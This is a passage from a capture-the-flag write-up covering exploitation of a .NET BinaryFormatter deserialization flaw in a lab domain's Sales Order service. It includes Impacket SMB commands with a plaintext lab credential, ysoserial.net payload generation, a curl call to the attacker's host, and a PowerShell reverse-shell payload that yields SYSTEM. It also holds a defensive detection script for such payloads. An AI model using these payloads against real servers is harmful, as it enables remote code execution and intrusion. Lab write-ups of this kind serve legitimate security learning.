Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Server not found in Kerberos database


Error: Exiting with code 1

Then use this account to look at the ITUser group's SMB shares:

└─$ impacket-smbclient scrm.local/miscsvc:ScrambledEggs9900@dc1.scrm.local -k -dc-ip 10.10.11.168
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# shares
ADMIN$
C$
HR
IPC$
IT
NETLOGON
Public
Sales
SYSVOL

# use IT
# ls
drw-rw-rw- 0 Wed Nov 3 15:32:55 2021 .
drw-rw-rw- 0 Wed Nov 3 15:32:55 2021 ..
drw-rw-rw- 0 Wed Nov 3 17:06:32 2021 Apps
drw-rw-rw- 0 Wed Nov 3 15:32:44 2021 Logs
drw-rw-rw- 0 Wed Nov 3 15:32:55 2021 Reports
# cd Apps

# ls
drw-rw-rw- 0 Wed Nov 3 17:06:32 2021 .
drw-rw-rw- 0 Wed Nov 3 17:06:32 2021 ..
drw-rw-rw- 0 Fri Nov 5 16:57:08 2021 Sales Order Client
#

This folder contains an exe and a dll.

This part has to be done in a Windows environment. Opening the exe on Windows shows it's the same program we saw on the web side.

So configure it according to the information on the web, and tick debug as well.

The server is dc1.scrm.local and the port is 4411.

I tried a few passwords here and none would log in. Decompiling it, though, shows that in the login part, entering the username scrmdev returns login success directly.

We turned on debug, so it writes all of its logs locally to a txt file.

Here, as the client, the base64 content we receive after login is obviously serialized data.

So keep clicking through its features, then refresh and check the log.

When I updated an order here, I observed the client sending a serialized request to the server.

Searching on the leading UPLOAD_ORDER keyword, I found this part in ScrambleNetRequest.

Next, find where the serialized part gets appended after UPLOAD_ORDER; Find Usages leads to the call inside SendRequestAndGetResponse.

Which is this:

UPLOAD_ORDER +";" +Request.Parmeter+"\n"

Look at where Request.Parmeter comes from: it's the UploadOrder method above that calls this.

Here again is SalesOrder, which defines a SerializeToBase64 method.

// SalesOrder (decompiled)
...
public string SerializeToBase64()
{
    // BinaryFormatter serializes the entire object graph of this SalesOrder;
    // the server has to deserialize the same format, which is what makes
    // the UPLOAD_ORDER payload dangerous.
    BinaryFormatter binaryFormatter = new BinaryFormatter();
    Log.Write("Binary formatter init successful");
    using (MemoryStream serializationStream = new MemoryStream())
    {
        binaryFormatter.Serialize((Stream) serializationStream, (object) this);
        return Convert.ToBase64String(serializationStream.ToArray());
    }
}
...

Plainly, the flow is: serialize the upload-order info, concatenate it as UPLOAD_ORDER;<serialized content>, and send that to the server.

That is scrm.local:4411, so the server side must Deserialize it, i.e. do the deserialization.

This calls for ysoserial.net.

I have no idea which gadget chains are usable on the other side, so I tried the ones that looked nice one by one.

I picked DataSet because its name is short.

.\ysoserial.exe -g DataSet -c "cmd /c curl 10.10.16.10" -f BinaryFormatter -o base64
AAEAAAD/////AQAAAAAAAAAMAgAAAE5TeXN0ZW0uRGF0YSwgVmVyc2lvbj00LjAu....

One pitfall here: when generating, don't use ' ; use " throughout. Below, for example, I used ' around the command part:

.\ysoserial.exe  -g DataSet -c 'cmd /c curl 10.10.16.10' -f BinaryFormatter -o base64
AAEAAAD...

The generated payload decodes to this:

...
<ObjectDataProvider.ObjectInstance>
<sd:Process>
<sd:Process.StartInfo>
<sd:ProcessStartInfo Arguments="/c curl" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" />
</sd:Process.StartInfo>
</sd:Process>
</ObjectDataProvider.ObjectInstance>
</ObjectDataProvider>

Compare with the decoded "-quoted version: in the '-quoted one, half the command is plainly missing, so keep this firmly in mind.

...
<ObjectDataProvider.ObjectInstance>
<sd:Process>
<sd:Process.StartInfo>
<sd:ProcessStartInfo Arguments="/c cmd /c curl 10.10.16.10" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" />
</sd:Process.StartInfo>
</sd:Process>
</ObjectDataProvider.ObjectInstance>
</ObjectDataProvider>

Send the base64 payload over.

└─$ cat yso
AAEAAAD/////AQAAAAAAAAAMAgAAAE5TeXN0ZW0uRGF0...

Both the debug log file and the decompilation point to the same conclusion: prefix it with UPLOAD_ORDER and send it to the server, and the other side will accept it.

So we send the payload the same way:

└─$ echo "UPLOAD_ORDER;`cat yso`" |nc 10.10.11.168 4411
SCRAMBLECORP_ORDERS_V1.0.3;
ERROR_GENERAL;Error deserializing sales order: Exception has been thrown by the target of an invocation.
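
The framing worked out above (a request line of the form UPLOAD_ORDER;<base64 BinaryFormatter blob>, answered with STATUS;message) also tells a defender what to look for, and the "AAEAAAD/////" prefix visible at the start of every payload in this post is the base64 of the BinaryFormatter stream header. The Python below is an added example of my own, not code from this writeup or from the Sales Order application: a server-side gate that parses that framing, decodes the payload, and refuses to pass anything that starts with a BinaryFormatter header on to a deserializer, reporting which known gadget type names it contains. This is a detection layer only; the actual fix is to stop feeding untrusted input to BinaryFormatter, which Microsoft documents as unsafe for that purpose. The two sample payloads are constructed (a header plus the DataSet assembly name, and a benign JSON-style order), not real ysoserial output, and the marker list and function names are mine.

```python
import base64
import binascii

# Every BinaryFormatter stream starts with a SerializationHeaderRecord:
# record type 0x00, RootId = 1, HeaderId = -1 (0xFFFFFFFF). Base64-encoded that is
# the "AAEAAAD/////" prefix seen at the start of the ysoserial output above.
BINARYFORMATTER_PREFIX = b"\x00\x01\x00\x00\x00\xff\xff\xff\xff"

# Assembly/type names used by published gadget chains (constructed, non-exhaustive);
# their presence in an untrusted stream is a strong detection signal.
GADGET_MARKERS = (
    b"System.Data, Version=",       # assembly of the DataSet gadget
    b"System.Data.DataSet",
    b"ObjectDataProvider",
    b"System.Diagnostics.Process",
    b"ProcessStartInfo",
)


def parse_request(line: str) -> tuple[str, str]:
    """Split one 'COMMAND;payload' line, the framing the client uses for UPLOAD_ORDER."""
    command, sep, payload = line.rstrip("\r\n").partition(";")
    if not sep:
        raise ValueError("malformed request: missing ';'")
    return command, payload


def inspect_payload(payload_b64: str) -> dict:
    """Decode the base64 and report whether it is a BinaryFormatter stream and which markers it holds."""
    try:
        data = base64.b64decode(payload_b64, validate=True)
    except (binascii.Error, ValueError):
        return {"decodable": False, "binaryformatter": False, "markers": []}
    return {
        "decodable": True,
        "binaryformatter": data.startswith(BINARYFORMATTER_PREFIX),
        "markers": [m.decode("ascii") for m in GADGET_MARKERS if m in data],
    }


def handle_upload_order(line: str) -> str:
    """Gate that runs before any deserialization; replies use the server's 'STATUS;message' shape."""
    try:
        command, payload = parse_request(line)
    except ValueError as exc:
        return f"ERROR_GENERAL;{exc}"
    if command != "UPLOAD_ORDER":
        return f"ERROR_GENERAL;unknown command {command}"
    report = inspect_payload(payload)
    if not report["decodable"]:
        return "ERROR_GENERAL;payload is not valid base64"
    if report["binaryformatter"]:
        markers = ",".join(report["markers"]) or "none"
        return f"ERROR_GENERAL;BinaryFormatter stream rejected (gadget markers: {markers})"
    return "OK;order accepted for safe parsing"


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


# Constructed samples (not real ysoserial output): a BinaryFormatter header followed by the
# length-prefixed (0x4E = 78 bytes) DataSet assembly name, and a benign JSON-style payload.
SAMPLE_GADGET = _b64(
    BINARYFORMATTER_PREFIX
    + b"\x01\x00\x00\x00\x00\x00\x00\x00\x0c\x02\x00\x00\x00"
    + b"\x4eSystem.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
)
SAMPLE_BENIGN = _b64(b'{"orderId": 42, "customer": "constructed"}')

if __name__ == "__main__":
    for req in (f"UPLOAD_ORDER;{SAMPLE_GADGET}\n", f"UPLOAD_ORDER;{SAMPLE_BENIGN}\n", "PING\n"):
        print(handle_upload_order(req))
```

Logging the rejected line together with the markers it matched gives the SOC the same signal the debug log gave the author here, without the server ever instantiating the payload.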

And we also see the other side deserialize and run the curl:

└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.168 - - [04/Jan/2025 08:25:17] "GET / HTTP/1.1" 200 -

Next, swap the payload for a reverse shell:

.\ysoserial.exe DataSet -g DataSet -c "powershell -e JABj....." -f BinaryFormatter -o base64
AAEAAAD/...

Send it again and we get a shell as SYSTEM.

getRoot


Learned a lot; a great box.